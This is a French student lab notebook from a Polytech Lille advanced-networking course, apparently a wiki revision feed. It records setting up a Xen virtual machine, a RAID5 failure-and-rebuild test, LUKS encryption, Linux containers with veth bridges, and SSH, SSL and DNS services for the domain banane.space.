    root@IMA5-BANANE:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être sûr que la partition soit encore montée après le reboot:&lt;br /&gt;
&lt;br /&gt;
    /dev/md0 /datamd0&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/datamd0# vim raid5test.txt&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
  /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous arrêtons la MV, mettons en commentaire la 1ère partition dans le fichier de configuration, puis redémarrons la machine. On constaste que la premiere partition a été &amp;quot;removed&amp;quot;:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
  /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# ls /datamd0/&lt;br /&gt;
    raid5test.txt&lt;br /&gt;
&lt;br /&gt;
Pour remettre la partition dans le raid5 il faut taper la commande suivante&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours: Suppression de la partition xvdd:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --set-faulty /dev/md0 /dev/xvdd&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --remove /dev/md0 /dev/xvdd&lt;br /&gt;
 La partition est bien supprimée:&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&lt;br /&gt;
On remet à présent la partition supprimée:&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd&lt;br /&gt;
&lt;br /&gt;
On essaie ensuite de remonter le RAID5 et on peut constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Nous n'avons qu'une carte SD pour tous les binômes. On crée donc un disque logiciel localement sur /dev/mmcblk1 nous-mêmes pour &lt;br /&gt;
effectuer son cryptage en AES avec un hachage SHA256 et on renseigne un mot de passe de cryptage.&lt;br /&gt;
&lt;br /&gt;
    cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
&lt;br /&gt;
Nous ouvrons la partition Luks, puis nous formatons le disque :&lt;br /&gt;
&lt;br /&gt;
    cryptsetup luksOpen /dev/sdb1 banane-crypt&lt;br /&gt;
    mkfs.ext4 /dev/mapper/banane-crypt&lt;br /&gt;
&lt;br /&gt;
On monte le disque et on crée un fichier avec du texte dessus.&lt;br /&gt;
&lt;br /&gt;
    mount /dev/mapper/banane-crypt /mnt&lt;br /&gt;
    vi /mnt/test.txt&lt;br /&gt;
&lt;br /&gt;
On démonte ensuite le disque et on ferme la partition Luks.&lt;br /&gt;
&lt;br /&gt;
    umount /mnt&lt;br /&gt;
    cryptsetup luksClose banane-crypt&lt;br /&gt;
&lt;br /&gt;
Pour vérifier le cryptage de notre disque, on tente d'accéder de nouveau au disque et on s'aperçoit qu'on nous demande le mot de passe.&lt;br /&gt;
&lt;br /&gt;
    cryptsetup luksOpen /dev/sdb1 banane-crypt&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau et création de conteneurs sous Machine Virtuelle Linux&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On se propose dans cette partie de réaliser la création et la mise en réseau de conteneurs sous Linux.&lt;br /&gt;
&lt;br /&gt;
Après avoir créé un système de fichiers avec debootstrap puis une machine virtuelle (IMA5-BANANE en l'occurence) sur le serveur de virtualisation Cordouan, on crée trois conteneurs C1, C2 et C3 distincts au sein celle-ci.&lt;br /&gt;
&lt;br /&gt;
Connecter les conteneurs en réseau :&lt;br /&gt;
&lt;br /&gt;
    créer une double interface Ethernet virtuelle ;&lt;br /&gt;
    sur l’hôte ajouter l’interface dans un pont virtuel ;&lt;br /&gt;
    envoyer le pair dans l’espace réseau du conteneur ;&lt;br /&gt;
    configurer l’adresse IP sur l’interface du conteneur ...&lt;br /&gt;
    ... il peut être nécessaire d’utiliser nsenter. &lt;br /&gt;
&lt;br /&gt;
Pour la création d'un conteneur, on utilise la commande unshare couplée à des options et à une fonction serverx.sh qui ne fait que repeter une fonction sleep 5 en boucle. Elle permet de lancer séparément une commande (ici /bin/serverx.sh) en définissant un root différent.&lt;br /&gt;
&lt;br /&gt;
    unshare -n -u -m -p -f chroot ./chroot /bin/serverx.sh&lt;br /&gt;
&lt;br /&gt;
Si on veut entrer dans le conteneur après en être sorti, on utilise la commande:&lt;br /&gt;
&lt;br /&gt;
    nsenter -n -u -m -p -t &amp;lt;PID&amp;gt; chroot ./chroot /bin/bash&lt;br /&gt;
&lt;br /&gt;
On ajoute alors toutes nos interfaces virtuelles eth0@vifX de type veth. Les Ponts &amp;quot;monpont&amp;quot; et &amp;quot;carrefour&amp;quot; ont déjà été définis dans /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
    ip link add vif1 type veth peer name eth0@vif1&lt;br /&gt;
    ip link add vif2 type veth peer name eth0@vif2&lt;br /&gt;
    ip link add vif3 type veth peer name eth0@vif3&lt;br /&gt;
    ip link add vif4 type veth peer name eth0@vif4&lt;br /&gt;
&lt;br /&gt;
On ajoute les vifx aux ponts correspondants&lt;br /&gt;
&lt;br /&gt;
    ip link set vif1 master monpont&lt;br /&gt;
    ip link set vif2 master carrefour &lt;br /&gt;
    ip link set vif3 master carrefour&lt;br /&gt;
    ip link set vif4 master carrefour&lt;br /&gt;
 &lt;br /&gt;
On peut vérifier la création à chaque commande grâce aux la commande:&lt;br /&gt;
&lt;br /&gt;
    ip l show et brctl show&lt;br /&gt;
&lt;br /&gt;
L'adresse ip de &amp;quot;monpont&amp;quot; est défini dans le fichier interfaces avec l'adresse 193.48.57.179 et est connecté au réseau via eth0&lt;br /&gt;
Nous avons choisis le reseau local entre les conteneur sur la plage 192.168.0.0/24. L'adresse de &amp;quot;carrefour&amp;quot; est 192.168.0.1.&lt;br /&gt;
&lt;br /&gt;
On peut alors définir eth0@vif1 (renommée eth0) comme étant l'interface entre le reverse proxy et &amp;quot;monpont&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
    ip link set eth0@vif1 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
On peut alors définir eth0@vif2 (renommée eth1) comme étant l'interface entre le reverse proxy et les carrefour.&lt;br /&gt;
&lt;br /&gt;
    ip link set eth0@vif2 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
On peut alors définir eth0@vif3 et eth0@vif4 (renommées eth0) comme étant les interfaces respectives entre le server1, serveur 2 et le pont carrefour.&lt;br /&gt;
&lt;br /&gt;
    ip link set eth0@vif3 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth0&lt;br /&gt;
    ip link set eth0@vif4 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur &amp;quot;chroot&amp;quot;, on ajoute alors l'adresse IP 193.48.57.189/28 à eth0 et on active eth0, vif1 et &amp;quot;monpont&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
    ip addr add 193.48.57.189/28 dev eth0&lt;br /&gt;
    ip link set dev eth0 up&lt;br /&gt;
    ip link set vif1 up&lt;br /&gt;
    ip link set dev monpont up&lt;br /&gt;
&lt;br /&gt;
Dans le conteneurs serverX et dans le reverse proxy, on ajoute alors les adresse IP 192.168.0.100/24 et 192.168.0.200/24 et 192.168.0.150/24 aux eth0 respectifs puis on active vif2 vif3 vif4 et &amp;quot;carrefour&amp;quot;.&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46462</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46462"/>
				<updated>2017-11-30T11:07:22Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Mise en réseau et création de conteneurs sous Machine Virtuelle Linux */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
       ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
       xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
       xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
[[Fichier:IMA5-BANANE.png]]&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
       xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
       xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
Commandes de base pour démarrer la VM proprement: &lt;br /&gt;
&lt;br /&gt;
    ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
    xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
    ssh username@weppes&lt;br /&gt;
    ssh root@193.48.57.179&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
    RSAAuthentication yes&lt;br /&gt;
    PubkeyAuthentication yes&lt;br /&gt;
    #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
    PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
    root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
Nous commencons par acheter un certificat SSL. Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout banane.key -out banane.csr&lt;br /&gt;
    Generating a 2048 bit RSA private key&lt;br /&gt;
    If you enter '.', the field will be left blank.&lt;br /&gt;
    -----&lt;br /&gt;
    Country Name (2 letter code) [AU]:FR&lt;br /&gt;
    State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
    Locality Name (eg, city) []:Lille&lt;br /&gt;
    Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
    Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
    Common Name (e.g. server FQDN or YOUR name) []:banane.space&lt;br /&gt;
    Email Address []:&lt;br /&gt;
    A challenge password []:&lt;br /&gt;
    An optional company name []:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2/sites-available/clef# ls banane.csr banane.key&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2/sites-available/clef# cat banane.csr&lt;br /&gt;
    -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
    &amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
    -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# apt-get install postfix mailx&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# cp certificat.crt /etc/ssl/certs/banane.space.crt&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# cp serveur.key /etc/ssl/private/banane.space.key&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-banane.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2/sites-available# cat 000-banane.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.banane.space&lt;br /&gt;
         ServerAlias banane.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/banane.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/banane.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# cat ports.conf &lt;br /&gt;
    Listen 80&lt;br /&gt;
    &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
    Listen 443&lt;br /&gt;
    &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
    &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
    Listen 443&lt;br /&gt;
    &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# service apache2 stop&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# service apache2 start&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre site est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
 zone &amp;quot;banane.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.banane.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
On créée ensuite le fichier db.banane.space:&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.banane.space. root.banane.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns.banane.space. &lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.179&lt;br /&gt;
 www     IN      A       193.48.57.179&lt;br /&gt;
 @       IN      A       193.48.57.179&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
    search banane.space&lt;br /&gt;
